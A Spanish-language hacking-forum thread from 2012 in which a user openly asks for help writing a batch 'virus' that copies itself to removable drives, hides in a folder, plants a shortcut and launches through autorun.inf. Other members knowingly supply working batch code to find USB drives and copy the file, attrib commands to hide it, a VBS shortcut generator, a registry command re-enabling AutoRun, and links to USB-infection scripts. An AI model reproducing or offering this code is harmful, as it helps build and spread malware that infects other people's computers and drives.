[BATCH] copiar y ocultar virus en unidades extraibles

imlikeabird34 · 23 Diciembre 2012, 18:25 PM

Buenas tardes comunidad, tal y como dice el titulo del tema necesito un comando para copiar un ejecutable SOLO A LAS UNIDADES EXTRAIBLES.
Quizas exista alguna variable de entorno que desconozco.
Tengo este codigo pero tambien copia a unidades del disco duro y solo quiero q se copie en unidades extraibles:

Código [Seleccionar]

@echo off
for %%unidad in (e f g h i j k l m n o p q r s t u v w x y z) do (
xcopy %userprofile%\desktop\virus.exe %unidad%: /Y
)

El virus debe estar oculto en una carpeta de la unidad extraible y debe crearse un acceso directo en el mismo.

Segadorfelix · 23 Diciembre 2012, 18:31 PM

mmn Tal vez este post te sirva:
http://foro.elhacker.net/scripting/script_batch_para_infeccion_a_traves_de_unidades_extraibles-t250133.0.html

imlikeabird34 · 24 Diciembre 2012, 02:50 AM

lei el tema pero no se explica bien que hace cada linea de código ademas si hay mas de un disco extraible el archivo solo se copia a uno.
PD: La ayuda del fsutil es excasa

Segadorfelix · 24 Diciembre 2012, 04:51 AM

fsutil necesita derechos administrativos, solo es necesario el comando "fsutil fsinfo drives"; me parece mejor que hagas un "escaneo" de las unidades sin usb(por ejemplo el equipo sin usb escanea C: y D:), tambien que sepa si se ejecuta de una usb o de una unidad. $:-\$

Otro link con mas informacion
http://foro.elhacker.net/scripting/seleccionar_unidad_y_ejecutar_comando-t332007.0.html

Eleкtro · 24 Diciembre 2012, 07:13 AM

Código (dos) [Seleccionar]

@Echo OFF
 
REM By Elektro H@cker
 
:: Obtenemos las letras de unidades conectadas
For /F "tokens=* delims=Unidades:\ " %%@ in ('fsutil fsinfo drives') Do (
	Call Set "Drives=%%@"
	Call Set "Drives=%%DRIVES::=%%"
	Call Set "Drives=%%DRIVES:\=%%"
	Call :isUSB?
	REM Listar
	Call Echo [Unidades] %%USBs:~1%% | MORE
)

:: FIN
Echo Se han procesado todas las unidades. | MORE
Pause&Exit
 
REM Comprueba si la unidad es un dispositivo USB
:isUSB?
For %%X in (%DRIVES%) Do (fsutil fsinfo drivetype %%X:\ | Find /I "extra" >NUL && (Call Set "USBs=%%USBs%% %%X"))
Goto:EOF

> Buscar y Listar archivos con cierta extensión en una computadora

También te puede servir este script:

> [BATCH] [APORTE] USB MON (Roba USB)

Saludos

imlikeabird34 · 26 Diciembre 2012, 04:53 AM

gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:

Código [Seleccionar]

@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f  %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))

Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf

Segadorfelix · 26 Diciembre 2012, 05:17 AM

Cita de: imlikeabird34 en 26 Diciembre 2012, 04:53 AM
gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
Código [Seleccionar] Expandir
@echo off for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do ( for /f %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do ( xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf

attrib para ocultar y VBS para crear los .lnk(esta en el tutorial de vbs por nov, en esta misma sección)
El autorun.inf, lo busco mas tarde y modifico el mensaje

(si es que alguien no lo hace antes

)

Eleкtro · 26 Diciembre 2012, 06:24 AM

Cita de: imlikeabird34 en 26 Diciembre 2012, 04:53 AMAdemas me gustaria que se abra con el autorun.inf

Cita de: Segadorfelix en 26 Diciembre 2012, 05:17 AMEl autorun.inf, lo busco mas tarde

Un autorun.inf para un pendrive es algo del pasado, obsoleto,
si van a utilizar Windows 7/8 es imposible ejecutar un autorun.inf porque Microsoft lo deshabilitó para dispositivos USB por medidas obvias de seguridad (A menos que usen un buen pendrive "camaleón" que se haga pasar por CD-ROM).

EDITO: Para WinXP no hay problema (Siempre que el servicio de reproducción automática esté activado en el equipo)

Código (dos) [Seleccionar]

REM Ocultar un archivo:
Copy "Archivo.ext" "...\Carpeta\"
Attrib +H "...\Carpeta\Archivo.ext"

Código (dos) [Seleccionar]


REM Crear un acceso directo:
(
 Echo: set objWSHShell = CreateObject("WScript.Shell"^)
 Echo: set objFso      = CreateObject("Scripting.FileSystemObject"^)
 Echo+
 Echo: File         = objFso.GetAbsolutePathName(WScript.Arguments.Item(0^)^)
 Echo: S_File       = objWSHShell.ExpandEnvironmentStrings(WScript.Arguments.Item(1^)^)
 Echo: S_WorkingDir = Left(File, InStrRev(File, "\"^) - 1^)
 Echo+
 Echo: set Shortcut = objWSHShell.CreateShortcut(S_File^) 
 Echo+ 
 Echo: Shortcut.TargetPath       = File
 Echo: Shortcut.WorkingDirectory = S_WorkingDir
 Echo: Shortcut.Save
)>"%TEMP%\Create_Shortcut.vbs"

WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.txt" "C:\Archivo.lnk"

Saludos.

imlikeabird34 · 27 Diciembre 2012, 04:48 AM

me sirvió ya pude ocultar mi carpeta, tengo 4 preg(disculpen mi ignorancia, estoy dando mis primeros pasos).
1) con que registro activo el servicio de reproducción automática en xp?
2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
3) podrían facilitarme un bat para la creación de accesos directos?
4) como agrego una contraseña a una carpeta o archivo

Eleкtro · 27 Diciembre 2012, 08:56 AM

Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM1) con que registro activo el servicio de reproducción automática en xp?

Código (dos) [Seleccionar]

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /V "NoDriveTypeAutoRun" /T "REG_DWORD" /D "0x00000091" /F

http://www.askvg.com/how-to-disable-autorun-functionality-in-windows-using-registry-editor/

El servicio de reproducción automática no recuerdo cual es, lo tengo capado en mi windows, búscalo en la lista de servicios de windows (Botón inicio > ejecutar > Services.smc) y luego es tán sencillo como hacer un:

Código (dos) [Seleccionar]

SC START "Nombre del servicio"

Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB

De ninguna manera, el autorun era lo único, pero como he explicado es algo obsoleto, deshabilitado en pendrives por medidas de seguridad.

PD: Si le pones ganas puedes programar una aplicación que monitorice las uniades extraíbles y ejecutar el programa deseado, pero obviamente deberás ejecutar tu aplicación programada manualmente.

Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM3) podrían facilitarme un bat para la creación de accesos directos?

Arriba te puse un archivo bat que sirve para eso.
Llámalo cono en el ejemplo:

Código (dos) [Seleccionar]

WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.ext" "C:\Archivo.lnk"

Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM4) como agrego una contraseña a una carpeta o archivo

No puedes proteger con contraseña nada usando Batch, lo único que puedes hacer es una chapuza como esto > http://www.howtogeek.com/105633/how-to-create-a-password-protected-folder-without-any-extra-software/

Código (dos) [Seleccionar]

cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Saludos